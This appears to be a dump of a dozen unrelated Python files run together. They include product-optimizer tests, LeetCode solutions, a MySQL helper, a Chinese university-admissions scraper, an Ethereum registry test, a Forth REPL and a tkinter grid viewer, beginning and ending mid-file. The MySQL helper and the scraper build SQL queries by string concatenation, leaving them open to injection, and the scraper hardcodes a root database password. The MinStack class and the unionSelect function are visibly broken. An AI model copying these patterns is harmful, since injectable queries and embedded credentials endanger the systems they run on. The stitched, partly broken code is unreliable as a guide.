product['adult']) self.assertEqual(0, optimization_result.num_of_products_optimized) @parameterized.named_parameters([{ 'testcase_name': 'DVD Category', 'is_adult': False, 'test_google_product_category': 'メディア > DVD・ビデオ', 'test_title': '何も怪しいことない', }, { 'testcase_name': 'Books Category', 'is_adult': False, 'test_google_product_category': 'メディア > 書籍', 'test_title': '何も怪しいことない', }]) def test_adult_optimizer_does_nothing_if_category_is_adult_but_no_adult_tokens_in_title( self, is_adult, test_google_product_category, test_title): original_data = requests_bodies.build_request_body( properties_to_be_updated={ 'adult': is_adult, 'googleProductCategory': test_google_product_category, 'title': test_title }) optimized_data, optimization_result = self.optimizer.process( original_data, 'test') product = optimized_data['entries'][0]['product'] self.assertEqual(False, product['adult']) self.assertEqual(0, optimization_result.num_of_products_optimized) @parameterized.named_parameters([{ 'testcase_name': 'Home Garden Category', 'is_adult': False, 'test_google_product_category': 'ホーム・ガーデン > キッチン・ダイニング > ' '調理器具', 'test_title': 'グラビア 器具', }, { 'testcase_name': 'DIY Category', 'is_adult': False, 'test_google_product_category': 'DIY用品 > DIY小物類', 'test_title': 'アイドル DIY', }]) def test_adult_optimizer_does_nothing_if_adult_tokens_in_title_but_category_is_not_adult( self, is_adult, test_google_product_category, test_title): original_data = requests_bodies.build_request_body( properties_to_be_updated={ 'adult': is_adult, 'googleProductCategory': test_google_product_category, 'title': test_title }) optimized_data, optimization_result = self.optimizer.process( original_data, 'test') product = optimized_data['entries'][0]['product'] self.assertEqual(False, product['adult']) self.assertEqual(0, optimization_result.num_of_products_optimized) @parameterized.named_parameters([{ 'testcase_name': 'Home Garden Category', 'is_adult': False, 'test_description': 'グラビア 器具', 'test_google_product_category': 'ホーム・ガーデン > キッチン・ダイニング > ' '調理器具', }, { 'testcase_name': 'DIY Category', 'is_adult': False, 'test_description': 'アイドル DIY', 'test_google_product_category': 'DIY用品 > DIY小物類', }]) def test_adult_optimizer_does_nothing_if_adult_tokens_in_description_but_category_is_not_adult( self, is_adult, test_description, test_google_product_category): original_data = requests_bodies.build_request_body( properties_to_be_updated={ 'adult': is_adult, 'description': test_description, 'googleProductCategory': test_google_product_category }) optimized_data, optimization_result = self.optimizer.process( original_data, 'test') product = optimized_data['entries'][0]['product'] self.assertEqual(False, product['adult']) self.assertEqual(0, optimization_result.num_of_products_optimized) @parameterized.named_parameters([{ 'testcase_name': 'Idol Category', 'is_adult': True, 'test_product_types': ['CD・DVD, Blu-ray', 'アイドル', 'その他'], }]) def test_adult_optimizer_does_nothing_if_adult_already_set( self, is_adult, test_product_types): original_data = requests_bodies.build_request_body( properties_to_be_updated={ 'adult': is_adult, 'productTypes': test_product_types }) optimized_data, optimization_result = self.optimizer.process( original_data, 'test') product = optimized_data['entries'][0]['product'] self.assertEqual(True, product['adult']) self.assertEqual(0, optimization_result.num_of_products_optimized)
class MinStack: def __init__(self): self.stack = [] def push(self, x: int) -> None: if len(self.stack) == 1: if self.stack[0] < x: self.stack.insert(0, x) else: self.stack.append(x) elif len(self.stack) > 1: if x > self.stack[0]: self.stack.insert(0, x) elif x < self.stack[-1]: self.stack.append(x) else: index = 0 while index + 1 < len(self.stack): print(f"Comparing {x} >= {self.stack[index+1]}") if x >= self.stack[index + 1] == True: self.stack.insert(index, x) index += 1 elif not self.stack: self.stack.append(x) print(f"Pushed {x} - Stack: {self.stack}") def pop(self) -> None: print(f"Popping {self.stack[-1]}") self.stack.pop(-1) def top(self) -> int: value = self.stack[-1] print(f"Popping {value}") self.stack.pop(-1) return value def getMin(self) -> int: return self.stack[-1] if __name__ == "__main__": minStack = MinStack() minStack.push(-2) minStack.push(0) minStack.push(-3) assert minStack.getMin() == -3, "getMin() should be -3" minStack.pop() assert minStack.top() == -2, "Top should return -2" assert minStack.getMin() == 0, "getMin() should be 0" minStack.push(15) minStack.push(-9) minStack.push(-3) minStack.push(5) minStack.push(4) minStack.push(-2)
""" Given an array of integers nums sorted in non-decreasing order, find the starting and ending position of a given target value. If target is not found in the array, return [-1, -1]. You must write an algorithm with O(log n) runtime complexity. https://leetcode.com/problems/find-first-and-last-position-of-element-in-sorted-array/description/ ---------------- I mean, the below is almost certainly not what they were hoping for, but also, I'd argue exactly how you should do it in Python, unless you want it very fast, but then why Python? """ import bisect import pytest class Solution: def searchRange(self, nums: list[int], target: int) -> list[int]: lhs_ind = bisect.bisect_left(nums, target) if len(nums) <= lhs_ind or nums[lhs_ind] != target: return [-1, -1] rhs_ind = bisect.bisect_right(nums, target, lo=lhs_ind) return [lhs_ind, rhs_ind - 1] @pytest.mark.parametrize( "nums,target,expected_result", ( ([5,7,7,8,8,10], 8, [3, 4]), # leetcode test ([5,7,7,8,8,10], 6, [-1, -1]), # leetcode test ([], 0, [-1, -1]), # leetcode test ([1], 2, [-1, -1]), # rhs bounds ([1, 2, 3], 2, [1, 1]), # single value ) ) def test(nums, target, expected_result): assert Solution().searchRange(nums, target) == expected_result
#!/usr/bin/env python3 # -*- coding:utf-8 -*- import MySQLdb #import pymysql #import mysql.connector import json db_config = { 'host': '127.0.0.1', 'user': 'root', 'passwd': '******', 'port': 3306, 'db': 'test', 'charset': 'utf8' } def connDB(): try: # MySQLdb.connect # mysql.connector.connect conn = MySQLdb.connect(host=db_config['host'], user=db_config['user'],passwd=db_config['passwd'], port=db_config['port'],charset=db_config['charset']) conn.autocommit(True) curr = conn.cursor() curr.execute("SET NAMES %s" % db_config['charset']) curr.execute("USE %s" % db_config['db']); print ("== connect db success ==") return conn,curr except MySQLdb.Error as e: print ("Mysql Error %d: %s" % (e.args[0], e.args[1])) return None,None def getCount(table=None,searchStr=None): try: cursor = connDB()[1] if table is None: return None if searchStr is None: sql = 'SELECT count(id) as cun FROM ' + table else: sql = "SELECT count(id) as cun FROM " + table + " WHERE name LIKE '%%%s%%'" %searchStr cursor.execute(sql) cun = cursor.fetchone() return cun[0] except MySQLdb.Error as e: print ("Mysql Error %d: %s" % (e.args[0], e.args[1])) return None finally: cursor.close() def select(table=None,searchStr=None): data = {} try: cursor = connDB()[1] if table is None: return None if searchStr is None: sql = 'SELECT * FROM ' + table else: sql = "SELECT * FROM " + table +" WHERE name LIKE '%%%s%%'" %searchStr cursor.execute(sql) #results = cursor.fetchall() results = cursor.fetchmany(1) users = [] for u in results: user = {} user['id'] = u[0] user['name'] = u[1] address = { "street": "科技园路.", "city": "武汉光谷", "country": "中国" } user['address'] = address users.append(user) data['code'] = 200 data['users'] = users jsonStr = json.dumps(data) return jsonStr except MySQLdb.Error as e: #print ("Mysql Error %d: %s" % (e.args[0], e.args[1])) data['code'] = str(e.args[0]) data['msg'] = str(e.args[1]) return json.dumps(data) except Exception as ex: #print ("Exception : %s" % ex) data['code'] = 404 data['msg'] = str(ex) return json.dumps(data) finally: cursor.close() def unionSelect(userId=None,searchStr=None): try: cursor = connDB()[1] if table is None: return None if searchStr is None: sql = "SELECT u.`id`,u.`name`,d.`address` FROM user u inner join user_detail d on u.id = d.user_Id and u.id = " + userId else: sql = "SELECT u.`id`,u.`name`,d.`address` FROM user u inner join user_detail d on u.id = d.user_Id and u.id = " + userId +" WHERE u.`name` LIKE '%%%s%%'" %searchStr cursor.execute(sql) results = cursor.fetchall() users = [] data = {} for u in results: user = {} user['id'] = u[0] user['name'] = u[1] users.append(user) data['code'] = 200 data['users'] = users jsonStr = json.dumps(data) return jsonStr except MySQLdb.Error as e: print ("Mysql Error %d: %s" % (e.args[0], e.args[1])) return None finally: cursor.close() def insertData(table=None,L=None): try: conn = connDB()[0] cursor = connDB()[1] if table is None: return None if L is None: return -1 sql = "INSERT INTO " + table +" VALUES (%s,%s)" cursor.executemany(sql,L) conn.commit() return 1 except MySQLdb.Error as e: print ("Mysql Error %d: %s" % (e.args[0], e.args[1])) return -1 finally: cursor.close() conn.close() def updateData(table=None,L=None): try: conn = connDB()[0] cursor = connDB()[1] if L is None: return -1 sql = 'UPDATE user SET name = %s where id = %s' cursor.executemany(sql,L) conn.commit() return 1 except MySQLdb.Error as e: print ("Mysql Error %d: %s" % (e.args[0], e.args[1])) conn.rollback() return -1 finally: cursor.close() conn.close() def deleteData(table=None,where=None): try: conn = connDB()[0] cursor = connDB()[1] if table is None: return None if where is None: sql = 'DELETE FROM ' + table else: sql = 'DELETE FROM '+ table + ' WHERE id in (%s)' cursor.execute(sql,where) conn.commit() return 1 except MySQLdb.Error as e: print ("Mysql Error %d: %s" % (e.args[0], e.args[1])) return -1 finally: cursor.close() conn.close() def printAll(results=None): if results is not None: for row in results: id = row[0] name = row[1] print ("id=%s,name=%s," % (id, name)) return None def batchInsert(table): items = [] for x in range(1,20000): items.append([str(x),'Iter笔记'+str(x)]) items = tuple(items) #print (items) flag = insertData(table,items) if flag == 1: print ("批量添加数据成功,总共插入:" + str(getCount(table))) else: print ("批量添加数据失败") def batchUpd(table): items = (['Iter笔记11','1'],['Iter笔记55','5',]) flag = updateData(table,items) if flag == 1: print ("批量修改数据成功") else: print ("批量修改数据失败") if __name__ == '__main__': #connDB() table = 'user' #print (getCount(table,'ff')) #print (select()) print (select(table,'ff')) #printAll(select(table)) #batchInsert(table) #batchUpd(table) #print (deleteData(table,['2'])) #print (unionSelect('100'))
# -*-coding: utf8 -*- ''' url =http://college.gaokao.com/school/tinfo(学校代码)/result/(省份代码)/(科目代码)/ 一共 2666所大学 省份 1-31,香港 33,澳门38,台湾39 理科 1 ,文科 2,综合 3,其他 4,艺术理 8,艺术文 9 用遍历来完成对 url的创建 ''' import requests import random import MySQLdb import time from lxml import etree import re import sys reload(sys) sys.setdefaultencoding('utf-8') sys.setrecursionlimit(2000000) class theAccessNum(): def __init__(self): self.user_agent_list = [ \ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1", \ "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11", \ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6", \ "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6", \ "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1", \ "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", \ "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5", \ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", \ "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", \ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", \ "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3", \ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3", \ "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3", \ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3", \ "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3", \ "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3", \ "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24", \ "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24" ] self.session = requests.session() self.province = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 33, 38, 39] self.type = [1, 2, 3, 4, 8, 9] def setupsession(self): try: headers = { 'Host': 'www.gaokao.com', 'User-Agent': random.choice(self.user_agent_list), } r = self.session.get('http://www.gaokao.com', headers=headers) cookies = r.cookies self.session.cookies.update(cookies) # 建立mysql链接 self.conn = MySQLdb.connect( host='localhost', port=3306, user='root', passwd='454647', db='college_info', charset="utf8" ) self.cur = self.conn.cursor() self.cur.execute('select count(*) from all_college') self.total_school = self.cur.fetchone()[0] self.urls = [] return self.constructUrl() except: print 'set up session 这里错误' def constructUrl(self): for each_college in range(2666): print '第', each_college + 1 ,'所学校' for each_province in self.province: for each_type in self.type: url = 'http://college.gaokao.com/school/tinfo/'+ str(each_college + 1) \ + '/result/' + str(each_province) + '/' + str(each_type) + '/' self.getData(url) time.sleep(1) self.conn.commit() print '抓取完毕' self.conn.close() print '失效的链接有' for wrong_link in self.urls: print wrong_link def getData(self, url): try: headers = { 'Host': 'college.gaokao.com', 'User-Agent': random.choice(self.user_agent_list), } selector = etree.HTML(self.session.get(url, headers=headers, timeout=5).content) ''' 将 学校+地区+考生类别 同 数据分开。遇到空数据,仍录入 学校+地区+考生类别的 数据. ''' school_name = selector.xpath('//div[@class="cont_l in"]/p/font[1]/text()')[0] area = selector.xpath('//div[@class="cont_l in"]/p/font[2]/text()')[0] s_type = selector.xpath('//div[@class="cont_l in"]/p/font[3]/text()')[0] print school_name,area,s_type if selector.xpath('//div[@class="cont_l in"]/div[@class="ts"]'): # 无数据,返回空的插入 SQL = 'insert into 各校各省录取人数(学校名称,地区,考生类别,是否为空)values(\'%s\',\'%s\',\'%s\',\'%s\')'\ % (school_name, area, s_type, 1) self.cur.execute(SQL) elif selector.xpath('//div[@class="cont_l in"]/div[@id="pointbyarea"]/table/tr'): # 有数据,采集 for each_info in selector.xpath('//div[@class="cont_l in"]/div[@id="pointbyarea"]/table/tr'): if each_info.xpath('td[1]/text()'): year = each_info.xpath('td[1]/text()')[0] else: year = '' if each_info.xpath('td[2]/text()'): min = each_info.xpath('td[2]/text()')[0] else: min = '' if each_info.xpath('td[3]/text()'): max = each_info.xpath('td[3]/text()')[0] else: max = '' if each_info.xpath('td[4]/text()'): ave = each_info.xpath('td[4]/text()')[0] else: ave = '' if each_info.xpath('td[5]/text()'): num = each_info.xpath('td[5]/text()')[0] else: num = '' if each_info.xpath('td[6]/text()'): admission_type = each_info.xpath('td[6]/text()')[0] else: admission_type = '' if year != '': SQL = 'insert into 各校各省录取人数(学校名称,地区,考生类别,年份,最低,最高,平均,录取人数,录取批次,是否为空)' \ 'value(\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\')' \ % (school_name, area, s_type, year, min, max, ave, num, admission_type, 0) self.cur.execute(SQL) except: print 'error,', url self.urls.append(url) def ex(self): headers = { 'Host': 'www.gaokao.com', 'User-Agent': random.choice(self.user_agent_list), } r = self.session.get('http://www.gaokao.com', headers=headers) cookies = r.cookies self.session.cookies.update(cookies) # 建立mysql链接 self.conn = MySQLdb.connect( host='localhost', port=3306, user='root', passwd='454647', db='college_info', charset="utf8" ) self.cur = self.conn.cursor() self.urls = [] text = open('demo').read() lists = re.findall('error, http://college.gaokao.com/school/tinfo/(.*?)\n', text, re.S) for i in lists: url = 'http://college.gaokao.com/school/tinfo/' + str(i) print url # self.getData(url) # time.sleep(1) print '仍然无效的链接' for p in self.urls: print p if __name__ == '__main__': c =theAccessNum() # c.setupsession() c.ex()
# Copyright 2020 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from os import urandom, path, environ import errno import logging import toml import json import unittest from web3 import Web3 from avalon_connector_sdk.ethereum.ethereum_worker_registry_list_connector \ import EthereumWorkerRegistryListConnectorImpl from avalon_client_sdk.utility.tcf_types import RegistryStatus from utility.hex_utils import hex_to_utf8, pretty_ids logging.basicConfig( format="%(asctime)s - %(levelname)s - %(message)s", level=logging.INFO) class TestEthereumWorkerRegistryConnector(unittest.TestCase): def __init__(self, config_file): super(TestEthereumWorkerRegistryConnector, self).__init__() if not path.isfile(config_file): raise FileNotFoundError("File not found at path: {0}".format( path.realpath(config_file))) try: with open(config_file) as fd: self.__config = toml.load(fd) except IOError as e: if e.errno != errno.ENOENT: raise Exception("Could not open config file: %s", e) self.__eth_conn = EthereumWorkerRegistryListConnectorImpl( self.__config) def test_registry_add(self): self.__org_id = urandom(32) self.__uri = "http://127.0.0.1:1947" self.__sc_addr = urandom(32) self.__app_type_ids = [urandom(32), urandom(32)] logging.info( 'Calling registry_add contract..\n org_id: %s\n ' + 'uri: %s\n ' + 'sc_addr: %s\n application_ids: %s', hex_to_utf8(self.__org_id), self.__uri, hex_to_utf8(self.__sc_addr), pretty_ids(self.__app_type_ids)) result = self.__eth_conn.registry_add( self.__org_id, self.__uri, self.__sc_addr, self.__app_type_ids) logging.info( "registry_add contract status \n{'status': %s', \n" + "'txn_receipt': %s}", result["status"], json.dumps( json.loads(Web3.toJSON(result["txn_receipt"])), indent=4)) self.assertEqual( result['status'], 'added', "Registry add response not matched") def test_registry_update(self): self.__new_app_id = [urandom(32)] self.__new_uri = 'http://localhost:1947' logging.info( 'Calling registry_update contract..\n org_id: %s\n uri: %s\n ' + 'sc_addr: %s\n application_ids: %s', hex_to_utf8(self.__org_id), self.__new_uri, hex_to_utf8(self.__sc_addr), pretty_ids(self.__new_app_id)) result = self.__eth_conn.registry_update( self.__org_id, self.__new_uri, self.__sc_addr, self.__new_app_id) logging.info( "registry_update contract status \n{'status': %s', \n" + "'txn_receipt': %s}", result["status"], json.dumps( json.loads(Web3.toJSON(result["txn_receipt"])), indent=4)) self.assertEqual( result['status'], 'added', "Registry update response not matched") def test_registry_set_status(self): self.__new_status = RegistryStatus.OFF_LINE logging.info( 'Calling registry_set_status contract..\n org_id: %s\n status: %d', hex_to_utf8(self.__org_id), self.__new_status.value) result = self.__eth_conn.registry_set_status( self.__org_id, self.__new_status) logging.info( "registry_set_status contract status \n{'status': %s', \n" + "'txn_receipt': %s}", result["status"], json.dumps(json.loads(Web3.toJSON(result["txn_receipt"])), indent=4)) self.assertEqual( result['status'], 'added', "Registry set status response not matched") def main(): logging.info("Running test cases...") tcf_home = environ.get("TCF_HOME", "../../") test = TestEthereumWorkerRegistryConnector( tcf_home + "/client_sdk/avalon_client_sdk/" + "tcf_connector.toml") test.test_registry_add() test.test_registry_update() test.test_registry_set_status() if __name__ == "__main__": main()
import glob import numpy as np import os import shutil import glob import numpy as np filePath = '/home/jyosa/melanoma/labels.csv' # As file at filePath is deleted now, so we should check if file exists or not not before deleting them if os.path.exists(filePath): os.remove(filePath) else: print("Can not delete the file as it doesn't exists") path = 'pneumonia/' save_path = os.getcwd() + "/" + 'labels.csv' with open(save_path,'a+') as data_file: files = [] # r=root, d=directories, f = files for r, d, f in os.walk(path): for file in f: if '.jpeg' in file: files.append(os.path.join(r, file)) data_file.write("id,clase") for f in files: id_img=f.split('/')[1].split('.')[0].strip() clase=f.split('/')[1].split('-')[0].strip() print(clase) data_file.write("\n{},{}".format(id_img,clase))
import argparse import configparser import socket from federatedrc import network class TestModelSender: def __init__(self): self.configure() def configure(self): parser = argparse.ArgumentParser(description='Test Model Transfer Sender Configuration') parser.add_argument('config', nargs=1, help='config file name') args = parser.parse_args() config = configparser.ConfigParser() config.read(args.config) self.server_ip = config['Test Config']['SERVER_IP'] self.port = int(config['Test Config']['PORT']) self.model_fname = config['Test Config']['MODEL_FILE_NAME'] def test_model_send(self): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setblocking(0) s.bind((self.server_ip, self.port)) s.listen() established = False while not established: try: client_conn, client_addr = s.accept() established = True except BlockingIOError: continue network.send_model_file(self.model_fname, client_conn) print('Model Transferred Successfully') if __name__ == '__main__': TestModelSender().test_model_send()
""" repl.py - top level read/eval/print loop. INTRO 1 : This is where ActorForth all begins for execution purposes. """ import sys from continuation import Continuation, Stack from interpret import interpret from af_types.af_any import print_words def print_stack_stats(stack): print("") print(stack.contents()) print("Stack max_depth = %s" % stack.max_depth()) print("Stack depth_history = %s" % stack.depth_history()) print("Stack total operations = %s" % stack.total_operations()) if __name__ == "__main__": print("ActorForth demo interpreter. ^C to exit.") print_words() """ INTRO 1.1 : Input always comes from a file whether that's the default stdin or a filename passed to the system. """ handle = sys.stdin filename = "stdin" if len(sys.argv) >= 2: filename = sys.argv[1] handle = open(filename) print("Interpreting file: '%s'." % sys.argv[1]) """ INTRO 1.2 : Establish our stack and build our stateful Continutaion from it. """ stack = Stack() cont = Continuation(stack) while True: """ INTRO 1.3 : Continuously call the Interpreter until ^C is hit, the input file runs out of tokens to parse, or an exception is encountered. TODO: Likely probably want exceptions to just reset the stack/Continuation and resume. """ try: cont = interpret(cont, handle, filename, prompt="ok: ") """ INTRO 1.4 : If the last token in the input file is 'resume' then we re-establish stdin as our input file and continue at the repl with everything intact. This is a special hard-coded command. TODO: How to do this in a more forth-like manner? INTRO 1.5 : Continue in interpret.py for INTRO stage 2. """ if cont.stack.tos().value == "resume": handle = sys.stdin filename = "stdin" cont.stack.pop() print_stack_stats(cont.stack) else: break except KeyboardInterrupt as x: print(" key interrupt.") break except Exception as x: print( x ) raise print_stack_stats(cont.stack) print("\nend of line...")
seller_1 = [33, 32, 56, 45, 33] seller_2 = [77, 33, 68, 45, 23] seller_3 = [43, 55, 43, 67, 65] product_A = 12 product_B = 16 product_C = 10 product_D = 14 product_E = 15 def Total_sales(A,B,C,D,E): seller_total_1 = (seller_1[0] * A) + (seller_1[1] * B) +(seller_1[2] * C) + (seller_1[3] * D) + (seller_1[4] * E) seller_total_2 = (seller_2[0] * A) + (seller_2[1] * B) + (seller_2[2] * C) +(seller_2[3] * D) + (seller_2[4] * E) seller_total_3 = (seller_3[0] * A) + (seller_3[1] * B) + (seller_3[2] * C) +(seller_3[3] * D) + (seller_3[4] * E) return(seller_total_1,seller_total_2,seller_total_3) print('第1位銷售員的銷售總額為 : %d 元 \n第2位銷售員的銷售總額為 : %d 元 \n第3位銷售員的銷售總額為 : %d 元' %(Total_sales(product_A,product_B,product_C,product_D,product_E))) def Total_product_sales(A,B,C,D,E): product_A_sales = (seller_1[0] + seller_2[0] + seller_3[0]) * A product_B_sales = (seller_1[1] + seller_2[1] + seller_3[1]) * B product_C_sales = (seller_1[2] + seller_2[2] + seller_3[2]) * C product_D_sales = (seller_1[3] + seller_2[3] + seller_3[3]) * D product_E_sales = (seller_1[4] + seller_2[4] + seller_3[4]) * E return(product_A_sales,product_B_sales,product_C_sales,product_D_sales, product_E_sales) print('第1項產品的銷售總額為 : %d 元 \n第2項產品的銷售總額為 : %d 元 \n第3項產品的銷售總額為 : %d 元 \n第4項產品的銷售總額為 : %d 元 \n第5項產品的銷售總額為 : %d 元' %(Total_product_sales(product_A,product_B,product_C,product_D,product_E))) def High_sales_seller(A,B,C,D,E): sales = Total_sales(A,B,C,D,E) k = len(sales) High_sales_reg = sales[0] for m in range(0,k,1): if sales[m] >= High_sales_reg: High_sales_reg = sales[m] seller = m+1 return(seller) print('有最好業績的銷售員是第 %d 位銷售員' %(High_sales_seller(product_A,product_B,product_C,product_D,product_E))) def High_sales_product(A,B,C,D,E): sales_product = Total_product_sales(A,B,C,D,E) k = len(sales_product) High_sales_product_reg = sales_product[0] for m in range(0,k,1): if sales_product[m] >= High_sales_product_reg: High_sales_product_reg = sales_product[m] product = m+1 return(product) print('銷售總金額為最多的產品是第 %d 個產品' %(High_sales_product(product_A,product_B,product_C,product_D,product_E)))
import tkinter as tk def max_reward(terminal_states): max_reward = float('-inf') for state in terminal_states: if state[2] > max_reward: max_reward = state[2] return max_reward def max_punishment(terminal_states): max_punishment = float('inf') for state in terminal_states: if state[2] < max_punishment: max_punishment = state[2] return max_punishment def draw_board(window, grid, terminal, boulders, max_reward, max_punishment, iterations): canvas_width = 1000 # Width of the window canvas_height = 600 # Length of the window edge_dist = 10 # Distance of the board to the edge of the window bottom_space = 100 # Distance from the bottom of the board to the bottom of the window small_rect_diff = 10 # For terminal states, distance from outside rectangle to inside rectangle rows = len(grid) # Number of rows in the grid cols = len(grid[0]) # Number of columns in the grid edge_dist_triangle = 5 # Distance from tip of the triangle to the edge of the rectangle triangle_height = int(0.1 * min(((canvas_width - 2 * edge_dist) / cols), ((canvas_height - edge_dist - bottom_space) / rows))) # Height of the triangles triangle_width = 2 * triangle_height # Width of the triangles canvas = tk.Canvas(window, width=canvas_width, height=canvas_height, background='black') # Create a black background for row in range(rows - 1, -1, -1): # Loop through the rows of the grid for col in range(cols): # Loop through the columns of the grid #print(row, col) if [row, col] not in boulders: # If it's not a boulder state x1 = edge_dist + col * ((canvas_width - 2 * edge_dist) / cols) # Top left x coordinate of the rectangle y1 = edge_dist + (rows - row - 1) * ((canvas_height - edge_dist - bottom_space) / rows) # Top left y coordinate of the rectangle #print(x1, y1) x2 = x1 + ((canvas_width - 2 * edge_dist) / cols) # Bottom right x coordinate of the rectangle y2 = y1 + ((canvas_height - edge_dist - bottom_space) / rows) # Bottom right y coordinate of the rectangle best_move = get_best_move(grid[row][col]) # Get the index of the maximum q-value for this cell best_value = grid[row][col][best_move][0] # Get the best q-value for this cell best_direction = grid[row][col][best_move][1] # Get the best direction out of this cell if best_value >= 0: # Best value is positive, so draw the rectangle in green canvas.create_rectangle(x1, y1, x2, y2, outline='white', fill='#%02x%02x%02x' % (0, int(200 * min(best_value / max_reward, max_reward)), 0)) # Draw the rectangle of this cell else: # Best value is negative, so draw the rectangle in red canvas.create_rectangle(x1, y1, x2, y2, outline='white', fill='#%02x%02x%02x' % (int(200 * min(best_value / max_punishment, -1 * max_punishment)), 0, 0)) # Draw the rectangle of this cell canvas.create_text((x1 + x2) / 2, (y1 + y2) / 2, text=str(round(best_value, 2)), font=('TkDefaultFont', int(0.2 * ((canvas_width - 2 * edge_dist) / cols))), fill='white') # Print the best value in the middle of the cell if [row, col] in terminal: # If this cell is a terminal state #print("TERMINAL: ", row, col) x1 = x1 + small_rect_diff y1 = y1 + small_rect_diff x2 = x2 - small_rect_diff y2 = y2 - small_rect_diff canvas.create_rectangle(x1, y1, x2, y2, outline='white') # Draw a smaller rectangle inside else: # Not a terminal state, so draw an arrow in the direction of the highest q-value if best_direction == '↑': # Draw an up arrow mid = (x1 + x2) / 2 top = y1 + edge_dist_triangle triange_points = [mid, top, mid - triangle_width / 2, top + triangle_height, mid + triangle_width / 2, top + triangle_height] canvas.create_polygon(triange_points, fill='white') elif best_direction == '↓': # Draw a down arrow mid = (x1 + x2) / 2 top = y2 - edge_dist_triangle triange_points = [mid, top, mid - triangle_width / 2, top - triangle_height, mid + triangle_width / 2, top - triangle_height] canvas.create_polygon(triange_points, fill='white') elif best_direction == '←': # Draw a left arrow mid = (y1 + y2) / 2 top = x1 + edge_dist_triangle triange_points = [top, mid, top + triangle_height, mid - triangle_width / 2, top + triangle_height, mid + triangle_width / 2] canvas.create_polygon(triange_points, fill='white') elif best_direction == '→': # Draw a right arrow mid = (y1 + y2) / 2 top = x2 - edge_dist_triangle triange_points = [top, mid, top - triangle_height, mid - triangle_width / 2, top - triangle_height, mid + triangle_width / 2] canvas.create_polygon(triange_points, fill='white') else: # This is a boulder state x1 = edge_dist + col * ((canvas_width - 2 * edge_dist) / cols) y1 = edge_dist + (rows - row - 1) * ((canvas_height - edge_dist - bottom_space) / rows) x2 = x1 + ((canvas_width - 2 * edge_dist) / cols) y2 = y1 + ((canvas_height - edge_dist - bottom_space) / rows) canvas.create_rectangle(x1, y1, x2, y2, fill='grey', outline='white') canvas.create_text(int(canvas_width / 2), canvas_height - bottom_space / 2, font=('TkDefaultFont', int(bottom_space / 2.5)), text=('VALUE AFTER ' + str(iterations) + ' ITERATIONS'), fill='white') # Write text at the bottom of the canvas canvas.pack() def get_best_move(state): max_value = float('-inf') max_index = -1 for move in range(len(state)): if state[move][0] > max_value: max_index = move max_value = state[move][0] return max_index
import warnings import captum import torch from captum.attr import visualization as viz from transformers import PreTrainedModel, PreTrainedTokenizer from transformers_interpret import BaseExplainer, LIGAttributions from transformers_interpret.errors import ( AttributionTypeNotSupportedError, InputIdsNotCalculatedError, ) SUPPORTED_ATTRIBUTION_TYPES: list = ["lig"] class SequenceClassificationExplainer(BaseExplainer): """ Explainer for explaining attributions for models of type `{MODEL_NAME}ForSequenceClassification` from the Transformers package. """ def __init__( self, text: str, model: PreTrainedModel, tokenizer: PreTrainedTokenizer, attribution_type: str = "lig", ): super().__init__(text, model, tokenizer) if attribution_type not in SUPPORTED_ATTRIBUTION_TYPES: raise AttributionTypeNotSupportedError( f"""Attribution type '{attribution_type}' is not supported. Supported types are {SUPPORTED_ATTRIBUTION_TYPES}""" ) self.attribution_type = attribution_type self.label2id = model.config.label2id self.id2label = model.config.id2label self.attributions = None self.input_ids = None def encode(self, text: str = None) -> list: if text is None: text = self.text return self.tokenizer.encode(text, add_special_tokens=False) def decode(self, input_ids): return 